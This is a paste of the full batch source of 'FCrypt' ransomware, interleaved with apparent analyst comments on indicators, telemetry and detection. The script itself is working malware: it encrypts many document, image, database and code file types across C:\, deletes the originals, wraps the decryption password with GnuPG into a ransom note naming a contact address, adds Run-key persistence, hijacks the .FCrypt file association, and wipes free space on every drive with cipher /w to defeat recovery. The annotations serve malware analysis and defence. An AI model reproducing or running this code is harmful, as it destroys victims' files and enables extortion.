bartblaze

FCrypt ransomware source

Feb 11th, 2019
Batch 3.30 KB | None | 0 0
  :: Entry point of the sample. Turns off command echo, enables delayed
  :: expansion (needed for the !var! syntax used further down), then decides
  :: whether to run at all.
  1. @shift
  2. @ECHO OFF
  3. ::Code By FIFCOM
  4. SetLocal EnableDelayedExpansion
  :: Run-once guard: "%temp%\FCRYPT_VICTIM.TMP" is the marker this script writes
  :: near the end of :pkgen. If it already exists the script jumps to :END and
  :: exits without touching anything. For responders the marker file is a host
  :: indicator that the script reached that point for this user profile.
  5. if not exist "%temp%\FCRYPT_VICTIM.TMP" (goto passgen
  6. ) else (goto END)
  7. :passgen
  8. cls
  :: If a hash file from an earlier (interrupted) run is still present, skip
  :: generation and go straight to :encrypt so the same value is reused.
  9. if exist "%temp%\FCRYPT_PASSMD5.TMP" goto encrypt
  :: Build the "id" part of the password: the first loop fills a lookup table
  :: x1..x62 with 0-9, a-z, A-Z; the nested loops then pick 10 entries using
  :: !random! %% 62 +1 and concatenate them. snow=1, so the outer loop runs once.
  10. set wind=2&& set snow=1
  11. for %%1 in (0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z A B C D E F G H I J K L M N O P Q R S T U V W X Y Z)do (set /a x+=1&& set x!x!=%%1)
  12. if "%wind%"=="2" (for /l %%1 in (1 1 %snow%)do (for /l %%2 in (1 1 10)do (set /a n%%2=!random! %% 62 +1
  13. call set 1%%1=!1%%1!%%x!n%%2!%%)
  14. set id=!1%%1!))
  :: The full password is the id followed by four values of cmd's built-in
  :: %random%, joined with '-'. It only exists in this process's environment
  :: and on the command lines below.
  15. set rand1=%random%
  16. set rand2=%random%
  17. set rand3=%random%
  18. set rand4=%random%
  19. set pass=%id%-%rand1%-%rand2%-%rand3%-%rand4%
  :: A bundled "md5" tool is run with the password as an argument and its
  :: output is redirected to "%temp%\$", then copied to FCRYPT_PASSMD5.TMP.
  :: NOTE(review): %MYFILES% is not defined anywhere in this listing; presumably
  :: it is set by whatever wrapper unpacks the bundled tools - confirm against
  :: the actual sample. The tool's exact output format is also not visible here.
  :: Detection/IR note: the plaintext password appears in the child process
  :: command line, so process-creation logging with command lines (e.g. Security
  :: event 4688 or Sysmon event 1) can capture it.
  20. %MYFILES%\md5 -d%pass%>"%temp%\$"
  21. copy "%temp%\$" "%temp%\FCRYPT_PASSMD5.TMP"
  22. del "%temp%\$" >nul 2>nul
  23. goto encrypt
  24.  
  25. :encrypt
  26. cls
  :: Read the first line of the hash file into passmd5; this value is what gets
  :: passed to the encryption tool below.
  27. set /p passmd5=<"%temp%\FCRYPT_PASSMD5.TMP"
  :: Recursive walk of C:\ only (no other drive letters, no network paths in
  :: this loop) over the listed extensions. For every match a bundled binary
  :: named svchost.exe is run from %MYFILES% with "-e <passmd5> <in> <out>",
  :: writing "<file>.FCrypt"; the original is removed with "del" only when the
  :: tool exits successfully (&&). All output is discarded.
  :: Detection notes: a process named svchost.exe running from a directory
  :: other than the Windows system directory, many "-e" invocations in a short
  :: time, and mass creation of *.FCrypt files followed by deletes are all
  :: visible in process and file telemetry. The passmd5 value is on each
  :: command line, so command-line logging records it.
  28. for /r "C:\" %%i in (*.xls *.doc *.xlsx *.docx *.pdf *.rtf *.cdr *.psd *.dwg *.cd *.mdb *.1cd *.dbf *.sqlite *.jpg *.jpeg *.zip *.bmp *.txt *.rar *.mp4 *.sql *.c *.cpp *.java *.php *.asp *.svg *.psd *.bak *.html) do (
  29. %MYFILES%\svchost.exe -e %passmd5% "%%i" "%%i.FCrypt" >nul 2>nul && del "%%i" >nul 2>nul
  30. )
  :: The hash file is deleted once the walk finishes, then a bundled VBScript is
  :: launched through wscript.exe.
  :: NOTE(review): the contents of delsc.vbs are not part of this listing; what
  :: it does has to be confirmed from the sample itself.
  31. del /f /q "%temp%\FCRYPT_PASSMD5.TMP" >nul 2>nul
  32. wscript.exe "%MYFILES%\delsc.vbs"
  33. goto pkgen
  34.  
  35. :pkgen
  36. cls
  37. del %temp%\$
  :: Build the victim record: computer name, user name, a version string and the
  :: plaintext password from :passgen are written to "%temp%\FCRYPT_KEY.TMP".
  :: Until the delete below, the password sits unencrypted in that file.
  38. echo.computername=%COMPUTERNAME%>"%temp%\FCRYPT_KEY.TMP"
  39. echo.username=%username%>>"%temp%\FCRYPT_KEY.TMP"
  40. echo.version=1.1>>"%temp%\FCRYPT_KEY.TMP"
  41. echo.decryptpass=%pass%>>"%temp%\FCRYPT_KEY.TMP"
  :: A bundled gpg.exe imports a bundled public key and encrypts the record to
  :: the recipient "FCrypt"; the next lines read the result from
  :: "%temp%\FCRYPT_KEY.TMP.gpg". Only the holder of the matching private key
  :: can read that blob. The plaintext record is then removed with plain "del".
  42. "%MYFILES%\gpg.exe" --import "%MYFILES%\FCRYPT_RSA_PUBLIC_KEY.TMP"
  43. "%MYFILES%\gpg.exe" -r FCrypt --yes -q --no-verbose --trust-model always --encrypt-files "%temp%\FCRYPT_KEY.TMP"
  44. del "%temp%\FCRYPT_KEY.TMP" >nul 2>nul
  :: certutil -encode turns the .gpg blob into Base64 text (FCRYPT.KEY), which is
  :: appended to a bundled text template to form the ransom note
  :: "#HELP-DECRYPT-FCRYPT1.1#.txt". certutil used as an encoder from a script is
  :: a common living-off-the-land pattern worth alerting on.
  45. C:\Windows\System32\certutil -encode "%temp%\FCRYPT_KEY.TMP.gpg" "%temp%\FCRYPT.KEY"
  46. copy /b "%MYFILES%\FCrypt.txt.tmp"+"%temp%\FCRYPT.KEY" "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt"
  :: Clean-up of GnuPG traces: the trust database in %temp% and the whole
  :: "%AppData%\gnupg" directory are stripped of attributes and deleted. Note
  :: that this also removes any GnuPG keyring the user legitimately had there.
  47. del /f /q "%temp%\trustdb.gpg"
  48. attrib -s -h -r "%AppData%\gnupg\*.*"
  49. attrib -s -h -r "%AppData%\gnupg"
  50. del /f /q "%AppData%\gnupg\*.*"
  51. rmdir /s /q "%AppData%\gnupg"
  :: The note is copied to the user's Desktop, and three values (FCRYPT1,
  :: FCRYPT2, FCRYPT3) are added under the per-user Run key. These value names
  :: and the note file name are registry/file indicators for hunting.
  52. copy "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt" %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt
  53. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT1" /t REG_SZ /f /d "notepad %temp%\#HELP-DECRYPT-FCRYPT1.1#.txt""
  54. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT2" /t REG_SZ /f /d "attrib -h %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt"
  55. reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "FCRYPT3" /t REG_SZ /f /d "copy "%temp%\#HELP-DECRYPT-FCRYPT1.1#.txt" %userprofile%\Desktop\#HELP-DECRYPT-FCRYPT1.1#.txt"
  :: Remaining *.gpg files and anything matching *.*xe in %temp% are deleted.
  56. del /f /q "%temp%\*.gpg"
  57. del /f /q "%temp%\*.*xe"
  :: File-type hijack: the .FCrypt extension is associated with a "FCRYPT" type
  :: whose open command is mshta.exe running an inline vbscript: message box
  :: that points at the note and a contact address. assoc/ftype changes and
  :: mshta.exe launched with a "vbscript:" argument are both detectable from
  :: command-line telemetry.
  58. echo Y|assoc .FCrypt=FCRYPT
  59. echo Y|ftype "FCRYPT"=mshta.exe vbscript:Execute^(^"msgbox ^"^" Sorry, this file has been encrypted.^"^"^&vbNewLine^&^"^" More information:^"^"^&vbNewLine^&vbNewLine^&ChrW^(10139^)^&^"^" #HELP-DECRYPT-FCRYPT1.1#.txt^"^"^&vbNewLine^&vbNewLine^&^"^" [HELP:fcrypt@qq.com]^"^",16,^"^"FCrypt Ransomware v1.1^"^":close^"^)
  60. echo Y|assoc "FCRYPT"\DefaultIcon=%SystemRoot%\System32\shell32.dll,-48
  :: Write the run-once marker checked at the top of the script.
  61. echo %random%%random%%random%>%temp%\FCRYPT_VICTIM.TMP
  :: Final stage: if cipher.exe is present, "cipher /w:<letter>:" is invoked via
  :: the :cipherw subroutine for every drive letter A-Z. cipher /w overwrites
  :: unused disk space, which defeats file-carving recovery of the originals
  :: removed earlier with "del". A burst of cipher.exe /w invocations across
  :: drive letters is a strong behavioural signal; interrupting it early
  :: preserves more recoverable data. The script then exits at :END.
  62. if exist "%systemroot%\system32\cipher.exe" (
  63. FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :cipherw %%s
  64. goto END
  65. :cipherw
  66. cipher /w:%1:
  67. goto:eof
  68. :END
  69. exit